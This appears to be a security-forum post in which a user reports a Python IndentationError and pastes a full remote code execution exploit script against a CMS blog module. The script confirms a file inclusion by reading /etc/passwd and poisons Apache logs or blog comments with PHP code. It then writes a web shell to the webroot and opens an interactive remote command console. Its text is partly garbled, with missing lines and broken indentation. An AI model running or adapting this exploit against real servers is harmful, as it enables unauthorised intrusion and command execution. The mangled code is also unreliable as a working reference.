ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Code:
C:\Python27>root.py
  File "C:\Python27\root.py", line 66
    pass
       ^
IndentationError: unindent does not match any outer indentation level

Code:
def getServerResponse(exploit):
    if options.proxy:
        try:
            opener = urllib2.build_opener(getProxy())
            opener.addheaders = [('User-agent', agent)]
            check = opener.open(exploit).read()
        except urllib2.HTTPError, error:
                        check = error.read()
            pass

Code:
#!/usr/bin/python
 
import sys, urllib, urllib2, socket, re, base64, getpass
from optparse import OptionParser
from random import choice
 
usage = "./%prog [] -t [target] -d [directory path]"
usage += "\nExample 1: ./%prog -l -p localhost:8080 -t 192.168.56.101 -d /webapps/"
usage += "\nExample 2: ./%prog -c -i 1294585604 -p localhost:8080 -t 192.168.56.101 -d /webapps/"
 
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy ")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server ")
parser.add_option("-d", type="string", action="store", dest="dirPath",
                  help="Directory path to the CMS")
parser.add_option("-i", type="string", action="store", dest="blogPostId",
                  help="Blog Post ID that will be injected")
parser.add_option("-l", action="store_true", dest="logInject",
                  help="Code execution via apache access log")
parser.add_option("-c", action="store_true", dest="blogComInject",
                  help="Code execution via Blog comments")
 
(options, args) = parser.parse_args()
 
def banner():
    print "\n\t| -------------------------------------------- |"
    print "\t|  Remote Code Execution Exploit |"
    print "\t|   ------------------- |\n"
 
if len(sys.argv) "
cmd = "&a="
agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
        "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
        "Microsoft Internet Explorer/4.0b1 (Windows 95)",
        "Opera/8.00 (Windows NT 5.1; U; en)"]
agent = choice(agents)
 
def getProxy():
    try:
        proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
    except(socket.timeout):
            print "\n(-) Proxy timed out"
            sys.exit(1)
    return proxy_handler
     
def getServerResponse(exploit):
    if options.proxy:
        try:
            opener = urllib2.build_opener(getProxy())
            opener.addheaders = [('User-agent', agent)]
            check = opener.open(exploit).read()
        except urllib2.HTTPError, error:
                        check = error.read()
            pass
    else:
        try:
            req = urllib2.Request(exploit)
                        req.addheaders = [('User-agent',agent)]
            check = urllib2.urlopen(req).read()
        except urllib2.HTTPError, error:
            check = error.read()
                        pass
    return check
 
def testFileInclusion():
    sys.stdout.write("\n(+) Testing the file inclusion vulnerability.. ")
    sys.stdout.flush()
    testFile = "etc/passwd"
    response = getServerResponse("http://" + options.target + options.dirPath + exploit + dDS + testFile + nB)
    if re.findall("root:x:", response):
        sys.stdout.write("file inclusion is working! \n")
        sys.stdout.flush()
    else:
        sys.stdout.write("file inclusion failed..\n")
        sys.stdout.flush()
        print "(-) Exiting.."
        sys.exit(1)
 
def writeDirtyLog():
    sys.stdout.write("(+) Poisoning the access log.. ")
    sys.stdout.flush()
        su = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        su.connect((options.target,80))
        except:
        print "(-) Failed sending the shell to target %s" % options.target
 
    junk = ("GET /hazStart"+phpShell+"hazEnd HTTP/1.1\r\nHost: "+options.target+"\r\nConnection: close\r\n\r\n")
    su.send(junk)
    su.close()
    sys.stdout.write("log poisoned!\n")
    sys.stdout.flush()
 
def huntLogFiles():
    foundLogs = []
    logs = ["var/log/httpd/access_log",
        "var/log/httpd/error_log",
        "apache/logs/error.log",
        "apache/logs/access.log",
        "apache/logs/error.log",
        "apache/logs/access.log",
        "apache/logs/error.log",
        "apache/logs/access.log",
        "apache/logs/error.log",
        "apache/logs/access.log",
        "apache/logs/error.log",
        "apache/logs/access.log",
        "logs/error.log",
        "logs/access.log",
        "logs/error.log",
        "logs/access.log",
        "var/log/apache2/access.log",
        "var/log/apache2/error.log",
        "var/log/apache2/access_log",
        "var/log/apache2/error_log",
        "logs/error.log",
        "logs/access.log",
        "logs/error.log",
        "logs/access.log",
        "logs/error.log",
        "logs/access.log",
        "etc/httpd/logs/acces_log",
        "etc/httpd/logs/acces.log",
        "etc/httpd/logs/error_log",
        "etc/httpd/logs/error.log",
        "var/www/logs/access_log",
        "var/www/logs/access.log",
        "usr/local/apache/logs/access_log",
        "usr/local/apache/logs/access.log",
        "var/log/apache/access_log",
        "var/log/apache/access.log",
        "var/log/access_log",
        "var/www/logs/error_log",
        "var/www/logs/error.log",
        "usr/local/apache/logs/error_log",
        "usr/local/apache/logs/error.log",
        "var/log/apache/error_log",
        "var/log/apache/error.log",
        "var/log/access_log",
        "var/log/error_log"]   
 
    for log in logs:
        response = getServerResponse("http://"+options.target + options.dirPath + exploit + dDS + log + nB)
        if re.search("hazStart", response):
            print ("(+) Log file found @ location: %s" % (log))
            foundLogs.append(log)
    return foundLogs
 
def writeLogWebShell(logFiles):
    print ("(+) Writing webshell %s.php to the webroot.." % (sName))
    cmd64 = base64.b64encode("echo \"\" > %s.php" % (sName))
    for log in logFiles:
        response = getServerResponse("http://"+options.target + options.dirPath + exploit + dDS + log + nB + cmd + cmd64)
 
def interactiveAttack():
    print "(+) Entering interactive remote console (q for quit)\n"
    hn = "%s@%s# " % (getpass.getuser(), options.target)
    preBaseCmd = ""
    while preBaseCmd != 'q':
        preBaseCmd = raw_input(hn)
        cmd64 = base64.b64encode(preBaseCmd)
        cmdResp = getServerResponse("http://"+options.target + options.dirPath + sName + ".php?p=" + cmd64)
        print cmdResp
    # suicide
    rmShell = base64.b64encode("rm %s.php" % (sName))
    cmdResp = getServerResponse("http://"+options.target + options.dirPath + sName + ".php?p=" + rmShell)
     
def testProxy():
    sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
    sys.stdout.flush()
    opener = urllib2.build_opener(getProxy())
    try:
        check = opener.open("http://www.google.com").read()
    except:
        check = 0
        pass
    if check >= 1:
        sys.stdout.write("proxy is found to be working!")
        sys.stdout.flush()
    else:
        print "proxy failed, exiting.."
        sys.exit(1)
 
def writeDirtyComment():
    sys.stdout.write("(+) Writing comment.. ")
    sys.stdout.flush()
    indexPage = "http://" + options.target + options.dirPath + "index.php"
    if options.proxy:
        try:
            values = {'do' : 'comment', 'id' : options.blogPostId, 'name' : phpShell, 'website' : 'findme', 'message' : 'm'
            , 'system' : 'Blog', 'post' : options.blogPostId }
                        data = urllib.urlencode(values)
            proxyfier = urllib2.build_opener(getProxy())
            proxyfier.addheaders = [('User-agent', agent)]
            check = proxyfier.open(indexPage, data).read()
 
        except:
                        print "(-) Proxy connection failed"
                        sys.exit(1)
    else:
            try:
            values = {'do' : 'comment', 'id' : options.blogPostId, 'name' : phpShell, 'website' : 'findme', 'message' : 'm'
                        , 'system' : 'Blog', 'post' : options.blogPostId }
            data = urllib.urlencode(values)
            req = urllib2.Request(indexPage, data)
                        req.addheaders = [('User-agent',agent)]
                        check = urllib2.urlopen(req).read()
            except:
            print "(-) Target connection failed, check your address"
            sys.exit(1)
    sys.stdout.write("comment shell written sucessfully\n")
    sys.stdout.flush()
 
def writeCommentWebShell():
    print ("(+) Writing webshell %s.php to the webroot.." % (sName))
    cmd64 = base64.b64encode("echo \"\" > %s.php" % (sName))
    ws = "http://" + options.target + options.dirPath + exploit + "../../data/modules/Blog/data/comments/"
    ws += options.blogPostId + ".txt" + nB + cmd + cmd64
    response = getServerResponse(ws)
 
if __name__ == "__main__":
    banner()
    print "(+) Exploiting target @: %s" % (options.target+options.dirPath)
    if options.proxy:
        testProxy()
    testFileInclusion()
    if options.logInject:
        writeDirtyLog()
        dirtyLogs = huntLogFiles()
        if dirtyLogs > 0:
            writeLogWebShell(dirtyLogs)
        else:
            print "(-) No log files found working."
            sys.exit(1)
    elif options.blogComInject:
        if options.blogPostId:
            writeDirtyComment()
            writeCommentWebShell()
        else:
            print "(-) Missing Blog Post ID value. See the example.. exiting.."
            sys.exit(1)
    else:
        print "(-) Arguments not set correctly, see the example.. exiting.."
        sys.exit(1)
    interactiveAttack()